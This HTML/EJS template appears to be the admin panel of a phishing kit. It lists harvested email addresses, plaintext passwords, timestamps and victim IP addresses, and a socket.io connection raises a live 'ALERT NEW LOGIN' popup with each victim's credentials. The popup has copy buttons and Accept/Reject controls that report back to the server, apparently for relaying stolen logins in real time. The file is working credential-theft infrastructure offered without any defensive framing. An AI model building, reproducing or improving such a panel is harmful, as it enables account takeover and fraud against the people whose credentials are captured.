<html>
  <head>
    <title>Hello Data</title>
    <link
      rel="stylesheet"
      href="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/css/bootstrap.min.css"
    />
    <script src="/socket.io/socket.io.js"></script>
    <script>
      var message = "";
      var email = "";
      var password = "";
    </script>
  </head>
  <body onload="Join()">
    <h1>Hello Data</h1>
    <table class="table">
      <thead>
        <tr>
          <th>Email</th>
          <th>Password</th>
          <th>Date</th>
          <th>IP Address</th>
        </tr>
      </thead>
      <tbody>
        <% for (let i = 0; i < result.length; i++) { %>
        <tr>
          <td><%= result[i].email %></td>
          <td><%= result[i].password %></td>
          <td><%= result[i].date %></td>
          <td><%= result[i].ipAddress %></td>
        </tr>
        <% } %>
      </tbody>
    </table>
    <script src="https://code.jquery.com/jquery-3.6.0.min.js"></script>

    <!-- Include Bootstrap JavaScript (Popper.js is required for proper functioning) -->
    <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.3.0/dist/js/bootstrap.bundle.min.js"></script>

    <script>
      const socket = io("ws://localhost:3001/");

      function generateUniqueCode() {
        const characters =
          "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789";
        let code = "";
        const codeLength = 10;

        for (let i = 0; i < codeLength; i++) {
          const randomIndex = Math.floor(Math.random() * characters.length);
          code += characters.charAt(randomIndex);
        }

        return code;
      }

      // Test the function
      let uinqCode = generateUniqueCode();

      function Join() {
        socket.emit("join", { role: "admin", userId: uinqCode });
      }

      socket.on("admin_joined", (data) => {
        if (uinqCode == data.userId) {
          setAdminDetails(data);
        }
      });

      function setAdminDetails(data) {
        localStorage.setItem("userId", String(data.userId));
        localStorage.setItem("socket", String(data.socket_id));
      }

      // Function to send a message to the server
      let myModal;
      function onPageLoad() {
        myModal = new bootstrap.Modal(document.getElementById("exampleModal"));
        // Open the popup automatically when the page loads
        myModal.show();
      }

      var creds;

      socket.on("show_popup", (data) => {
        console.log('inside, show_popup');
        onPageLoad();
        creds = data.creds;
        Object.keys(data.creds).forEach((item) => {
          let doc = document.getElementsByClassName(item)[0];
          doc.innerText = data.creds[item];
        });
      });

      function accept() {
        socket.emit("accept_request", { status: "accept", data: creds });
        myModal.hide();
      }
      function reject() {
        socket.emit("accept_request", { status: "reject", data: creds });
        myModal.hide();
      }

      async function copycontent(e) {
        try {
          await navigator.clipboard.writeText(creds[e]);
        } catch (error) {
          console.error("Failed to copy to clipboard:", error);
        }
      }
    </script>

    <!-- Bootstrap Modal  -->
    <div
      class="modal fade"
      id="exampleModal"
      tabindex="-1"
      data-bs-backdrop="static"
      data-bs-keyboard="false"
      tabindex="-1"
      aria-labelledby="staticBackdropLabel"
      aria-hidden="true"
      aria-hidden="true"
    >
      <div class="modal-dialog">
        <div class="modal-content">
          <div class="modal-header align-items-center">
            <h5 class="modal-title" id="exampleModalLabel">ALERT NEW LOGIN</h5>
            <button
              type="button"
              class="btn-close border-0 px-3 py-2 rounded-pill"
              onclick="reject()"
            >
              X
            </button>
          </div>
          <div class="modal-body">
            <!-- Content of the popup -->
            <p class="changes">This is a popup content.</p>
            <p>
              <span class=""><strong> Email: </strong> </span>
              <span
                class="email"
                title="Click here to copy."
                style="cursor: pointer"
                onclick="copycontent('email')"
              ></span>
            </p>
            <p>
              <span class=""><strong> Password: </strong> </span>
              <span
                class="password"
                title="Click here to copy."
                style="cursor: pointer"
                onclick="copycontent('password')"
              >
              </span>
            </p>
          </div>
          <div class="modal-footer">
            <button type="button" class="btn btn-primary" onclick="accept()">
              Accept
            </button>

            <button
              type="button"
              class="btn btn-secondary"
              data-bs-dismiss="modal"
              onclick="reject()"
            >
              Reject
            </button>
          </div>
        </div>
      </div>
    </div>
    <!-- Bootstrap Modal  -->
  </body>
</html>
